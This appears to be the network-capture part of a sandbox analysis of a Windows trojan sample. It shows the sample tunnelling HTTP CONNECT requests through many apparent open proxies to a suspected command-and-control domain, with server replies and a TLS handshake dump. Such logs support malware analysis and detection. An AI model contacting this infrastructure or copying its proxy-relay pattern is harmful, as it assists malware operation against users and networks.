                                                                                238192.168.2.85086547.243.177.21080885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.695199966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                239192.168.2.850934174.75.211.22241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.695202112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                240192.168.2.850997172.67.181.37805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.700639009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.788077116 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                241192.168.2.85094768.1.210.18941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.715564966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                242192.168.2.851013162.243.102.20797645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.716223001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                243192.168.2.851023104.19.233.117805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.727549076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.815893888 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                244192.168.2.85020751.15.209.188163795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.729686975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882299900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                245192.168.2.85018154.36.108.149563675828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.730221987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882348061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.992019892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.991904020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.991723061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                246192.168.2.850031148.66.130.187600835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.741430998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                247192.168.2.850957174.77.111.19641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.743516922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                248192.168.2.850129161.97.170.20944415828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.748517990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882414103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991983891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.991925001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.991748095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                249192.168.2.850988199.229.254.12941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.752186060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                250192.168.2.851048185.162.231.254805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.756680012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.844846964 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                251192.168.2.85013131.28.4.192805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.759700060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.000088930 CET488INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 306
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 63 2e 70 6c 6f 6d 62 77 61 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 1c.plombway.ru Port 80</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                252192.168.2.85014178.189.191.184484255828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.759989977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                253192.168.2.85098918.135.133.116805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.761790037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.924889088 CET165INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.3.6-13ubuntu3.6
                                                                                Server: Microsoft-IIS/8.5
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:23.926943064 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 9d 77 78 11 3b 8f 2f 7d f1 32 5d d5 cb 14 9a f2 da 88 fe 30 61 08 cc 4c 08 cc f2 cd 28 f4 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: ewx;/}2]0aL(*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                Feb 23, 2024 14:28:24.084781885 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 fa 2b a3 c5 26 98 c5 68 68 aa eb 1c 1e 93 c0 99 6c 08 17 03 48 58 55 06 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                Data Ascii: =9+&hhlHXUDOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223130621Z260222130621Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                Feb 23, 2024 14:28:24.088356972 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 f4 b4 cb b4 82 c4 45 09 21 6b 9c d4 68 fd d4 00 4c 6a 7b 0c bc 1d 6a 04 fb 62 dc c3 f9 c1 fa 6a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 46 5c 08 61 ac e6 1b ff 28 1a cc 89 42 8f a1 fd 36 76 11 81 be
                                                                                Data Ascii: %! E!khLj{jbj(F\a(B6vlk4
                                                                                Feb 23, 2024 14:28:24.243643999 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 54 b1 ba ff 5a d9 56 f8 92 08 75 4c 58 68 40 5e bc f8 68 dd c8 ae c4 6b 98 a8 29 0a af a7 e4 40 24 dc d7 ab d4 8b 75 bc
                                                                                Data Ascii: (TZVuLXh@^hk)@$u


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                254192.168.2.851057209.97.150.16780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.773124933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.505027056 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                255192.168.2.85093294.20.183.172805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.779802084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.027595997 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                256192.168.2.85025151.79.87.144543955828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.780096054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882448912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991991043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                257192.168.2.85089960.246.122.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.785651922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                258192.168.2.85095485.12.214.148805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.804480076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                259192.168.2.850981195.225.142.16980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.804692030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.335342884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.976210117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.382565022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.991909027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.695079088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                260192.168.2.85103594.23.252.16891805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.816349983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                261192.168.2.851009212.127.93.18580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.822164059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                262192.168.2.851002164.163.21.1482915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.822535038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                263192.168.2.851073152.32.238.63380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.826092958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                264192.168.2.85104351.75.125.208416495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.830535889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.288486004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                265192.168.2.850255167.99.39.82460155828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.832089901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882479906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.992018938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.991923094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                266192.168.2.85102095.43.244.1541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.838139057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                267192.168.2.850985190.128.228.182805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.867743969 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:24.120315075 CET1286INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Server: Apache/2.4.56 (Ubuntu)
                                                                                Set-Cookie: PHPSESSID=ped525kmk15h2pl57r911tsncv; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 5101
                                                                                Content-Type: text/html; charset=utf-8
